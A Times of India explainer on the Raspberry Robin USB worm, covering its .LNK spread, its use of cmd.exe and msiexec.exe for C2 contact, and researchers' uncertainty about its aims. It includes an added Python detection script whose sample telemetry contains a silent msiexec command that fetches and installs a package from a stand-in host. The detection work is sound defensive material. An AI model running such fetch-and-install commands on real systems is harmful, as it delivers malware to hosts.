Explained: How a ‘Windows worm’ spread across corporate networks through USB drives – Times of India
Microsoft has recently discovered a malicious “Windows worm” that has already spread into several corporate networks. According to a report by TechRadar, the software giant has quietly shared its findings with companies subscribed to Microsoft Defender for Endpoint. Meanwhile, the company’s security research team has explained that this malware, named Raspberry Robin, has not yet been used. However, “it has been observed connecting to multiple addresses on the Tor network.”
What is Raspberry Robin?
In 2021, researchers from Red Canary discovered a “cluster of malicious activity” and identified the Raspberry Robin malware for the first time, the report states. As per the report, the malware is “usually distributed offline,” through compromised USB drives. The researchers also examined an infected drive and found that the worm spreads to new devices through a “malicious .LNK file.”
How did the malware spread?
When an infected USB drive is connected to a new device, the worm launches a new process through cmd.exe and runs the file on the compromised endpoint. The researchers also note that the worm uses Microsoft Standard Installer (msiexec.exe) to contact its command and control (C2) server, the report claims. It is speculated that the server is “hosted on a compromised QNAP NAS device,” with Tor exit nodes being used as additional C2 infrastructure. In 2021, cybersecurity experts at Sekoia also observed this worm using QNAP NAS devices as C2 servers.
The report states, “While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
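The chain just described (a file run from a USB drive via cmd.exe, followed by msiexec.exe reaching out to an external domain) is exactly what a defender would hunt for in process-creation telemetry. The Python below is an added example for this article, not code from Microsoft, Red Canary or Sekoia. It walks a list of constructed process-creation records (field names loosely follow Sysmon Event ID 1; the drive letter, URL, file names and process IDs are made up) and flags msiexec.exe launches that are handed a URL instead of a local package, raising the severity when a cmd.exe ancestor ran something from a non-system drive.

```python
"""Flag msiexec.exe launches that fetch a package from a URL, and score them
higher when the parent chain matches the USB -> cmd.exe -> msiexec.exe pattern
described in the article.  Added illustration; all sample data is constructed."""

import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (a subset of Sysmon Event ID 1 fields)."""
    pid: int
    ppid: int
    image: str      # full path of the executable that started
    cmdline: str    # command line as logged


# Any scheme that msiexec would treat as a remote package source.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

# A drive letter other than C: on a command line; removable media typically
# mount this way.  (Assumption: C: is the system drive on the monitored hosts.)
NON_SYSTEM_DRIVE_RE = re.compile(r"\b[D-Zd-z]:\\")


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_msiexec_with_remote_package(ev: ProcEvent) -> bool:
    """msiexec.exe normally installs a local .msi; a URL on its command line
    means it will download the package, which is the behaviour the article
    attributes to Raspberry Robin's C2 contact."""
    return image_name(ev.image) == "msiexec.exe" and URL_RE.search(ev.cmdline) is not None


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[ProcEvent]:
    """Walk the parent chain by ppid; stops at an unknown pid or max_depth
    so malformed telemetry (e.g. a pid that is its own parent) cannot loop."""
    chain: List[ProcEvent] = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def find_suspicious_msiexec(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per msiexec.exe launch with a remote package.
    Severity is 'medium' for the URL alone and 'high' once the parent chain
    also shows the cmd.exe / removable-drive delivery step."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if not is_msiexec_with_remote_package(ev):
            continue
        reasons = ["msiexec.exe asked to install a package from a URL"]
        chain = ancestors(ev, by_pid)
        cmd_parents = [p for p in chain if image_name(p.image) == "cmd.exe"]
        if cmd_parents:
            reasons.append("launched via cmd.exe")
        if any(NON_SYSTEM_DRIVE_RE.search(p.cmdline) for p in cmd_parents):
            reasons.append("cmd.exe ran a file from a non-system drive")
        severity = "high" if len(reasons) >= 2 else "medium"
        findings.append({"pid": ev.pid, "cmdline": ev.cmdline,
                         "severity": severity, "reasons": reasons})
    return findings


# Constructed sample telemetry: one malicious-looking chain (pids 100-300)
# and two benign msiexec.exe launches (the service instance and a local install).
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c E:\constructed.cmd"),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i http://example.invalid/pkg.msi"),
    ProcEvent(400, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
    ProcEvent(600, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\app.msi"),
]

if __name__ == "__main__":
    for finding in find_suspicious_msiexec(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["pid"], "; ".join(finding["reasons"]))
```

Only the msiexec.exe launch with a URL is reported; the Windows Installer service instance and the local .msi install pass silently. In a real deployment the URL-only case will still catch some legitimate software-deployment tooling, which is why it is scored lower than the full chain.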
How is the malware being used?
As per the report, researchers haven’t been able to link the malware to a specific threat actor. Moreover, they are not even sure about the malware’s intentions, as it is not being actively used, the report suggests. Meanwhile, a researcher also recently said, “We also don’t know why Raspberry Robin installs a malicious DLL.”
One theory is that the malware is attempting “to establish persistence on an infected system.” However, this is only a hypothesis that has not yet been proven, and more information is required to build confidence in it, the report claims.